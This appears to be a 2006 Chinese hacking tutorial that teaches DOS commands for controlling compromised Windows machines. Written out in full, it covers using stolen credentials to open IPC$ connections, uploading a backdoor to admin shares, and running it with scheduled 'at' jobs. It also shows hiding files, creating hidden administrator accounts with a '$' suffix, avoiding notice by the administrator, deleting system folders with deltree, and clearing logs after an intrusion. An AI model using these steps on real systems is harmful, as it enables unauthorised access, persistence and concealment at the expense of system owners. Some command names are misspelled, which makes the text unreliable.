常用的DOS命令  

引用
石点头 的 初级黑客
黑客入门版-DOS命令 

顶 热 荐  ★★★★
 字体:小 大 
 

 
作者:绝版猪QQ…    文章来源:本站原创    点击数:1562    更新时间:2006-4-20 
 
 
咱们就以windows2000为例,windows xp类同. 
DIR
显示当前盘下的所有文件夹和文件.
比较常用的方法是,你上传一个后门或服务端(这儿比如名字叫systems.exe)到肉鸡的c:\winnt\system32下,你想看看有没有上传成功.可以用DIR命令看一下. 命令如下 :

   DIR c:\winnt\system32\systems.exe

则会显示:
          2004-05-24  20:06           194,762 systems.exe
               1 个文件        194,762 字节
               0 个目录  4,658,597,888 可用字节

如果你没有上传成功,则显示如下:
                                  驱动器 C 中的卷没有标签。
                                 卷的序列号是 6458-3DB8
                                  c:\winnt\system32\的目录
                                   找不到文件

CD
改变当前目录
具体看一下下面的命令:
                        C:\>cd winnt             //进入winnt文件夹

                        C:\winnt>cd system32      //进入system32 文件夹

                         C:\winnt\system32>cd..    //回到上一级目录

                         C:\winnt>cd..

                          C:\>
                         C:\>d:                //进入D盘

                        D:\>e:                  //进入E盘

                          E:\>

del和deltree
DEL:删除文件.
看下面的命令:
               C:\>del c:\xx\ww.txt  //删除C盘的XX目录下的名叫WW的文件.

               C:\>
               C:\>del c:\xx\*.*     //删除C盘的XX目录下所有文件

deltree
这个更具有破坏性,不但能删除所有文件,连文件夹也删除
            
                     C:\>deltree c:\winnt //删除C盘下的winnt所有文件和文件夹.
这个大家要小心使用.


attrid
显示和更改文件或文件夹属性.
文件或文件夹的属性有 隐藏,用字母H表示.   只读,用R表示.   存档,用A表示.  系统,用S表示
改变一个文件或文件夹属性,  " + " 表示增加,  "  -  ",表示去掉某个属性.
平时我们都把后门或服务端到上传肉鸡的c:\winnt\system32下.在进入了肉鸡的CMD以后,为了更加的不让肉鸡管理员知道,我们可以把你上传的隐藏起来.比如还是上面的systems.exe
命令如下:
            C:\>attrid +h   c:\winnt\system32\systems.exe   //这样在system32下就找不到systems.exe
 
            C:\>attrid -h   c:\winnt\system32\systems.exe  //去掉systems.exe的隐藏属性

copy
复制一个或多个文件到其它目录
比如你把C盘下一个叫1.txt文件复制到D盘的vv文件夹下,
               
                        C:\>copy c:\1.txt  d:\vv\1.exe

比如你和肉鸡建立了IPC$连接(如何连接?以后会讲的),而且肉鸡开放了共享,这里比如开放了D盘.你可以把你C盘下的一个叫systems.exe的后门或服务端上传肉鸡的D盘下,命令如下:
                    
                   C:\>copy c:\systems.exe    \\肉鸡IP\d$


type
显示文件内容
我现在在我的C盘的XX目录下新建一个叫hack.txt的文件,内容是一些台湾的IP
命令如下:

           C:\>type c:\xx\hack.txt
序号    开始IP地址      结束IP地址      国家/省/直辖市  城市/区县/组织
58      024.179.140.000 024.179.150.255 中国台湾省
80      061.013.000.000 061.013.255.255 中国台湾省
86      061.058.065.000 061.058.070.255 中国台湾省
87      061.059.160.000 061.059.255.255 中国台湾省
89      061.070.100.000 061.070.150.255 中国台湾省
1788    061.217.179.000 061.217.179.255 中国台湾省      台南市
1789    061.216.000.000 061.219.255.255 中国台湾省
1790    061.220.080.000 061.220.150.255 中国台湾省      台北市
1791    061.224.000.000 061.224.255.255 中国台湾省      台北市
1792    061.225.000.000 061.225.255.255 中国台湾省
3390    134.208.000.000 134.208.255.255 中国台湾省
3584    139.175.000.000 139.175.255.255 中国台湾省
3590    140.092.000.000 140.092.255.255 中国台湾省
3593    140.096.000.000 140.096.255.255 中国台湾省
3596    140.112.000.000 140.112.255.255 中国台湾省      台湾大学
C:\>

它还有一个用法,就是在进入肉鸡的CMD以后,看看肉鸡用的是什么操作系统,命令如下,在我电脑操作的结果如下:

                    C:\>type c:\boot.ini

                     [boot loader]
                     timeout=30
                     default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
                    [operating systems]
                     multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"
                    /fastdetect

看出来没有?,我用的是XP系统.

这是一些我认为常用的命令,其它的还有rd,md等.你们有兴趣可以找资料看看.平进比较少用.

ping
这个是用的最多的命令.可是现在好像不灵光了.大多数网站和个人电脑用防火墙屏蔽了ping.大多数时候根本是P不通.基本命令:
                               ping   ip
                               ping   网址

下面P的是本站:

C:\>ping [url]www.hf110.com[/url]

Pinging [url]www.hf110.com [/url][218.89.0.231] with 32 bytes of data:

Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=66ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116

Ping statistics for 218.89.0.231:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 66ms, Maximum = 67ms, Average = 66ms

上面P出本站的IP是218.89.0.231,从TTL=116.大略看出使用的是windows操作系统.一般来说TTL值在128左右的是windows操作系统,值在225左右的,大多数是unix类系统.但是还有特殊情况,管理员可能会通过改注册表来修改TTL值.


net use
在得到肉鸡的用户名和密码这后,可以用这个命令做IPC$连接

net use \\肉鸡ip\ipc$ "密码"  /user:"用户名"

连接成功后,上传后门或服务端,(比如叫systems.exe,在你的D盘下).

copy D:\systems.exe  \\肉鸡ip\c$   //这里它要开放共享,你才能上传.否则无法上传成功.

net time \\肉鸡ip   //看一下肉鸡的时间,是24小时制.比如这儿是下午3点10分.写作15:10

at  \\肉鸡ip  15:12  systems.exe   //在15:12分,运行systems.exe

在这儿,你上传的是反弹木马的话,可以等着它来连接你.其实在入侵过程中,有很多的偶然性,比如上面的,你可以IPC连接成功.但是并一定能够通过net time \\肉鸡ip ,看肉鸡时间.就算能看到时间吧,有时肉鸡的at服务并没有打开.就算打开了,但是后门或服务端不一定能够有机会运行,
可能被杀毒软件查杀.所以在入侵过程中,失败是常有的事.这个方法不行,可以另一种.


net user
查看用户或新建一个用户.
这是在我电脑上的截图


C:\>net user

\\BILLGATES 的用户帐户

---------------------------------------------------------------------
Guest                    guest1                   HelpAssistant
SUPPORT_388945a0         yhkj
命令成功完成。


C:\>


上面是我所有的用户.
现在我新建一个setwell的用户,密码是123456,  截图如下

C:\>net user setwell 123456 /add
命令成功完成。

C:\>net localgroup administrators setwell /add       //这条命令是加setwell为管理员
命令成功完成。                        


接下来我们再net user ,载图如下

C:\>net user

\\BILLGATES 的用户帐户

----------------------------------------------------------------
Guest                    guest1                   HelpAssistant
setwell                  SUPPORT_388945a0         yhkj
命令成功完成。


建立的用户可以用net user命令看到,我们在用户后面加个$,可以小小的隐藏一下.这次建一个叫set的用户,截图如下:

C:\>net user set$ 123456 /add
命令成功完成。

C:\>net localgroup administrators set$ /add
命令成功完成。                        

C:\>net user

\\BILLGATES 的用户帐户

-----------------------------------------------------------------
Guest                    guest1                   HelpAssistant
setwell                  SUPPORT_388945a0         yhkj
命令成功完成。


C:\>

看到没有,我们没有看到刚才建立的用户set$,可以用这个命令看,net localgroup administrators ,这个命令的是显示所有的管理员,截图如下:


C:\>net localgroup administrators
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

------------------------------------------------------
guest1
set$
setwell
yhkj
命令成功完成。


C:\>


看到没有,我们看到set$这个用户了.

如果要删除用户用这个命令:

C:\>net user setwell /delete


net start
1.启动某些服务
比如:                net start telnet   //启动telnet服务

2.查看当前启动了什么服务.看看我的电脑启动了什么服务:

C:\>net start
已经启动以下 Windows 服务:

Automatic Updates
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Messenger


这只是一部分服务.


net stop
停止某些服务.站长今天也说到了.我不多了.

net share
查看默认共享.也就是查看这些共享C$ D$ e$ f$ admin$ ipc$,这是系统默认的.我的全部关了,我
到肉鸡上截张图吧.

C:\Documents and Settings\Administrator>net share
D$           D:\                             默认共享                          
F$           F:\                             默认共享                          
ADMIN$       C:\WINNT                        远程管理                          
C$           C:\                             默认共享                          
E$           E:\                             默认共享                          
命令成功完成。


C:\Documents and Settings\Administrator>

这个肉鸡的IPC$共享竟然关了.


net view
也是查看共享,但不是上面的默认共享了,还是来张截图吧.也是肉鸡的,

C:\Documents and Settings\Administrator>net view
服务器名称            注释

-------------------------------------------------------------------------------
\\17                                                                           
\\HMZ                                                                          
\\ZGH                                                                          
命令成功完成。


C:\Documents and Settings\Administrator>


学DOS命令看起来有点烦,其实是挺容易学的.而且学好了,在入侵中,会起到举足轻重的作用.下次讲netstat 等命令.


netstat -an 
使用这个命令可以察看到和本机的所有的连接.看一下在我电脑上的截图,

D:\>netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    180.254.158.42:139     0.0.0.0:0              LISTENING
  TCP    218.95.49.187:2935     218.89.0.231:80        ESTABLISHED
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1035           *:*
  UDP    0.0.0.0:1037           *:*
  UDP    0.0.0.0:1134           *:*
  UDP    0.0.0.0:1136           *:*

 

Proto  Local Address          Foreign Address        State
协议   本地端口及IP地址       远程端口及IP地址      状态

LISTENING  监听状态  表示等待对方连接

ESTABLISHED  正在连接着.

TCP  协议是TCP

UDP  协议是UDP

TCP        218.95.49.187:2935     218.89.0.231:80        ESTABLISHED
这个表示  利用tcp协议 本机ip(218.95.49.187通过端口:2935 和远程ip(218.89.0.231)端口:80连接


query
这个命令只有在开了3389端口(也不一定端口是3389,说不定改成别的端口了.严格讲应是开了远程终端服务)的机子,才能用上.我用1$的用户名上了一台3389机子,看一下截图:

c:\>query user
USERNAME         SESSIONNAME       ID   STATE
administrator     console           0    运行中
1$                rdp-tcp#2         1    运行中


看到上面没有,管理员也在,如果你要退出的话,就用如下命令:

logoff ID  这儿是logoff 1.

这是正常退出的.说到退出,还有一个办法,就是在开始---关机---注销1$.如果你用另外的方法退出的话,那么肉鸡在关机时,会出现类如"有一个其它客人登录到这台服务器,如果你退出,对方的会话数据会丢失"一类的话.这样管理员就会发现了.
 前面三章,写的应该比较全了,但是我发现有几个重要的没有写进去,所以这里在写一篇补充的.

我们和目标主机建立IPC$连接后,要把后门,木马之类的软件传过去,其实这个命令是DOS基础的

命令,我这里就写个格式.

一.copy 
呵呵,命令一写就知道了吧,在网上看的太多了,其他格式都不用我写了,呵呵.
copy 本地文件 \\目标IP\目标共享文件夹(一般是admin$)

如果提示"命令成功完成",那恭喜你,你的权限够,并且文件成功的复制到目标主机.

二.at
这个是"计划服务"的命令,我们一般是用它来运行我们复制到目标主机的程序.
我们首先用net time命令查看目标主机的当前时间,然后再用at来运行.它的格式是
at \\目标主机IP 时间(什么时间运行,我们一般设定为与目标主机时间差一分钟) 运行的程序

名称 

好这样我们就加了一条计划任务,下面我们就等着程序的运行了.在此期间我们可以用
at \\目标主机IP 来查看程序是否运行.如果我们加的记录还在里面说明程序还没有运行,如果

提示记录为空说明我们的程序已经运行了,呵呵下面该干什么,干什么了.


好我要补充的命令就这两个,其实主要是AT命令呵呵,下面我再大概的讲讲入侵步骤吧.

一.确定目标主机
这点是必须的,因为如果你连要入侵的主机都没有确定,那怎么入侵呀,入侵谁呀?对吧,呵呵.
其实这点最好定了,因为我们既然要入侵肯定是要找好目标的.具体的确定方法,每个人都有自己

的特点,没有统一的什么规则.

二.扫描目标主机
有许多人把这步放在第一,他们总是喜欢找个IP段,然后无目的的乱扫,如果扫到有时候漏洞的主

机就很高兴,如果扫不到,呵呵就说扫描器不好,或是没有找对IP段.
我个人不赞同这种做法,我觉得这种做法真的很愚蠢,而且效果特别的差.除非本来自己就是准备

乱扫的,本来就没有什么目标那可以.
我一般是先确定主机后,手工或是从表面来看看,然后在用扫描器进行扫描探测得出结果.这样成

功率更高一点.

三.分析探测结果
这点是不能省的,一般扫描结果出来后,有些人就看扫描器给的结果中有没有弱口令,或是什么漏

洞等,如果有就进行入侵,如果没有就跳过了.呵呵,我觉得这就是失误,因为扫描器的结果只是给

我们应该参考,我们不能完全的相信和依赖它.要是想当所谓的黑客,那就一点要有自己的头脑.
我们应该结合收集来的目标主机信息,进行综合分析.看看哪点值得利用.什么地方可以有突破等

.这就要看你的本事了.

四.针对结果进行入侵
分析结果出来后,我们要针对不同的结果用不同的方法,这样成功率高.

五.入侵成功后的后门
入侵成功后,我们进入了目标主机,注意一定不要留下太多的动作.这时候就要留一个好的后门,

我觉得好的后门就是不留后门,我们就利用系统本身提供的服务来做后门这是最好的方法,而方

法又是多种多样,完全是看自己怎么用了.

六.清除日志
这就不用我多说了吧,不要告诉我你们入侵后都不清除的,呵呵.
可以手工也可以用工具.

好,一般的入侵步骤都写在这里了,也许有的人有不同的步骤和方法.如果好,那也可以写出来让

我们大家共同学习.
 
文章录入:120003043    责任编辑:120003043  
 
 
[版权声名] 本站转载稿件及图片均来自于互联网,版权归属其版权拥有者全权所有。骇客基地此频道仅作为展示与交流之用。作品不代表本站观点,本站不承担此类稿件侵权行为的连带责任。谢谢您的支持!―― 骇客基地 

你可能感兴趣的:(职场,休闲,DOS命令)